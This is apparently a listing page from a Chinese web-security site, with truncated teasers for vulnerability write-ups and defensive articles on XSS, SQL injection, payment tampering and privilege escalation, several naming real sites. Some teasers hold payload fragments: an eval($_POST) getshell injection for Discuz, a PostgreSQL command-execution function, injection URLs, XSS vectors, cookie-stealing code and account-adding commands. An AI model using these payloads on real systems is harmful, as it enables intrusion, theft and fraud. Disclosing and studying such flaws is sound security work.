重置Plesk的Admin帐号密码提权 - 网站安全 - 自学关注热度:29

前几天提权了个国外的空间商服务器，装的是plesk主机管理系统，以前就知道可以在服务器上直接找回密码，顺手弄了一下，找到了方案，完了直接在IP后面加上8443访问，当然以SSL方式访..[详情]

利用SQLMap进行cookie注入 - 网站安全 - 自学php关注热度:78

SQLMap被称为注入神器，N多大神都使用SQLmap来进行注入测试，我等小菜当然也会用来装一下A*C，用了N久SQLMAP了，但是极少用到cookie注入，一遇到cookie注入就去使用注入中转工具，比较麻烦..[详情]

腾讯短信炸弹 无限制条数短信发送 - 网站安全关注热度:29

朋友网客户端下载此处未做任何的号码及条数限制post提交 就构成了短信炸弹朋友网客户端下载：http://www.pengyou.com/mobile?tg=10046from=homeadtag=profile_mobile此处未做任何的号码及条数限制post提..[详情]

优酷网存在账号被劫持风险 - 网站安全 - 自学p关注热度:93

今天某公司发表了互联网最大规模账号劫持漏洞即将引爆微博搞的人心惶惶的，但是由于只提到说不是以前的oauth漏洞而且没有任何细节，所以只好根据描述的信息自己去测试一下了。但..[详情]

phpcms申请友情链接可进行跨站攻击(v9.1.5和v9.2.3关注热度:25

鸡肋的phpcms申请友情链接可进行跨站攻击，分别测试了v9.1.5和v9.2.3，方法不同v9.1.5直接在网站名称写body onload=alert(1)，直接触发v9.2.3需要写scriptalert(1)/script，且需要管理员在后台点修....[详情]

绕过faisunzip.php压缩程序打包整站程序 - 网站安全关注热度:36

因刀JJ要求,写个分析源码过程:绕过faisunzip压缩程序 打包整站程序今天扫描网站的时候 发现有个压缩文件程序： zip.php代码被该了 怎么也进不去，到这我就想绕过进入程序，查看了一下..[详情]

dedecms最新注入两处漏洞及修复方法 - 网站安全关注热度:15

织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名，是国内最知名的PHP开源网站管理系统，也是使用用户最多的PHP类CMS系统，在经历了二年多的发展，目前的版本无论在功能，还是在..[详情]

网易有道某分站盲注及修复 - 网站安全 - 自学p关注热度:13

网易有道某分站盲注，导致用户信息泄漏地址：http://campus.youdao.com/campus/job_list.php?t1=campuspositionId=1有漏洞的参数是positionId，用and语句判断存在SQL注入。http://campus.youdao.com/campus/job.....[详情]

国内某知名3C在线商城可以偷换商品价格生成订单关注热度:16

商品购买页面可以修改购买的商品价格生成订单详细说明：该商品购买页面将商品的good_id放在input的隐藏域中，input type=hidden value=321589 name=goodsId id=goods_id当点击购买的时候提交并通过..[详情]

WEB安全之XSS注入预防策略——CSP - 网站安全 - 自关注热度:17

首先本章内容是关于WEB安全的一隅，由于本人知识所限本文所述可能有误，若看官有疑问可以联系文叔（ darrel.hsu@gmail.com ）。特别感谢 @Sogl 以及 @剑心 两位老师～ WEB的盛行让这个网络..[详情]

解析如何防止XSS跨站脚本攻击 - 网站安全 - 自学关注热度:17

www.2cto.com：老文章了。最近xss火了，发出来看看这些规则适用于所有不同类别的XSS跨站脚本攻击，可以通过在服务端执行适当的解码来定位映射的XSS以及存储的XSS，由于XSS也存在很多特..[详情]

CSP浏览器安全策略备忘 - 网站安全 - 自学php关注热度:19

挺久之前过了一遍CSP的安全策略，很多人把它喻为XSS攻击的终结者，因为这种策略不再像传统只靠各种正则和特征匹配来识别跨站攻击Payload，而是直接从协议层把一些存在安全隐患的用..[详情]

小议OAuth 2.0的state参数——从开发角度也说《互联关注热度:165

有一个外国研究员在最近研究OAuth 2.0的登录过程中发现了许多程序员常犯的错误（见翻译文：http://www.2cto.com/Article/201210/163105.html）， 知道创宇测试国内各网站后发现确为如此，并在今天..[详情]

联想某站任意文件下载 - 网站安全 - 自学php关注热度:31

下载图片时没有判断是否图片：提交以下url:http://launcher.lenovo.com/launcher/portal.php?mod=mymaterialurl=source/module/member/member_getpasswd.phpwid=168可爱的源码出来了：修复方案：直接下载图不就.....[详情]

100e某xss问题可导致管理沦陷、站点沦陷 - 网站安关注热度:18

一个小小xss引起的大问题1.100e站点有个业务是：一百易诚招全国各区/县代理，看来是要做大的样子http://100e.com/business/v3/index.html2.可惜这个页面存在xss的入口，我申请了注册代理，在【主..[详情]

记一次曲折的N点虚拟主机提权 - 网站安全 - 自学关注热度:36

http://www.2cto.com / 199.36.7.232（均为代替目标站）拿shell灰常简单，这里就飘过，欢迎大牛来交流拿shell方法。提权开始。由于探测可得，上传以下马！http://www.2cto.com /inc/yueyan.php php大马....[详情]

驴妈妈旅游网严重支付漏洞 - 网站安全 - 自学p关注热度:17

1这是一个普通的订单：2然后还是抓包修改价格参数3然后的情况就知道了没有支付，如果有人工审核应该会过滤这样的订单的。希望你们有，也希望你们诚实。修复方案：最简单一条：..[详情]

本地元素修改上传拿shell - 网站安全 - 自学php关注热度:27

目标站：http://www.2cto.com /admin/index.asp进后台看看：1.有上传2.有数据库操作3.有系统设置拿shell，我有三种方法1.上传直接上传抓包爆出路径filepath，这里可以考虑NC提交，或者本地修改元素..[详情]

akcms的演示站的注入漏洞及修复 - 网站安全 - 自学关注热度:11

search.php文件存在漏洞，注入入口：http://lishi.akcms.com/search.php?keywords=a%cf#39;+or+1=1如图所示，已经猜解到库：密码hash也出来了：修复方案：在keyword上做过滤，最起码要做addslashes，对于非..[详情]

1ting音乐存储型xss:可致蠕虫,可穷举用户,可暴力破关注热度:24

1. 注册后，xss存在于个人昵称和简介处。个人昵称的长度可手工突破，直接在控制台给个人昵称赋值。注册tmxkorg的账号测试：我的主页效果：http://my.1ting.com/site/58525762. 因为留言是审核..[详情]

XSS获取cookie并利用 - 网站安全 - 自学php关注热度:14

获取cookie利用代码cookie.asphtmltitlexx/titlebody%testfile = Server.MapPath(code.txt) //先构造一个路径，也就是取网站根目录，创造一个在根目录下的code.txt路径，保存在testfile中msg = .....[详情]

关于web渗透中得一些记录 - 网站安全 - 自学php关注热度:31

1. 当得到linux root shell时，采用如下语句可以添加管理员帐户 写道useradd icefish //添加icefish用户passwd icefish //设置密码awk -F: #39;{print $1}#39; /etc/passwd 可以查看有多少用户不.....[详情]

postgresql"初级"注入方法 - 网站安全 - 自学关注热度:13

CREATE FUNCTION id() RETURNS text AS $aaa$open(FD,chr(108).chr(105).chr(32).chr(124));return join(chr(0),FD);$aaa$ LANGUAGE plperlu;select id();id()为创建函数名，可以自定义随便写chr(10.....[详情]

动易xss拿站小记 - 网站安全 - 自学php关注热度:114

对动易CMS的一次XSS攻击以及UDF提权小菜文章~求基友求交流me@startend.net目标检测站点：www.xxoo.net操作系统：WINDOWS2003IIS版本：6.0使用环境:ASP.NET同IP下站点数量：40x001检测IP下站点数量0x00..[详情]

.net文件上传漏洞代码实例及修复方案 - 网站安全关注热度:46

这时在作测试时扒下来的代码有的丢掉了，只有个修补方案。大家凑合着看吧。东西很简单。string str = filename.Substring(filename.LastIndexOf(.) + 1, 3); if (str == png || s.....[详情]

Discuz!X2.5最新版后台管理员权限Getshell及修复 - 网关注热度:46

Discuz!X2.5最新版后台管理员权限Getshell。1.在后台--站长--Ucenter设置处设置UcenterIP为XX\\#39;);eval($_POST[a])?;// XX2.发现管理页面代码出来了3.上菜刀！4.看一下源码，哦，原来是这样的！修复方..[详情]

开心网android客户端暴力破解漏洞 - 网站安全 - 自关注热度:32

开心网的android客户端（接口）存在暴力破解漏洞。使用该客户端（接口）登录，不会限制登录错误的次数，且没有验证码。通过抓包分析，得到登录时候的POST请求为：POST http://api.kaix..[详情]

我买网某分站后台注入 - 网站安全 - 自学php关注热度:24

首先是后台地址泄漏http://tuan.womai.com/groupBuy/listOrderManage.jsp后台登陆地址：http://tuan.womai.com/login.jsp登陆处存在 oracle 注入http://tuan.womai.com/j_spring_security_check?j_password=a.....[详情]

TP-Link官方商城支付漏洞及修复 - 网站安全 - 自学关注热度:29

TP-Link官方网上商城http://www.tp-linkshop.com.cn/存在支付漏洞注册购买路由交换设备后到购物车支付，比如用支付宝支付可以任意篡改交易金额，漏洞等级高。图一图二图三图四图五图六图七..[详情]

网易微博两个存储型XSS - 网站安全 - 自学php关注热度:17

第一个：1、在首页发微博，截获包然后修改。content=testisRetweet=0replyOriginal=0replyIt=0flag=0imageUrl=voteUrl=bbb修改了voteUrl参数为bbb，然后提交。2、回到首页，已经发布了一条微博。但.....[详情]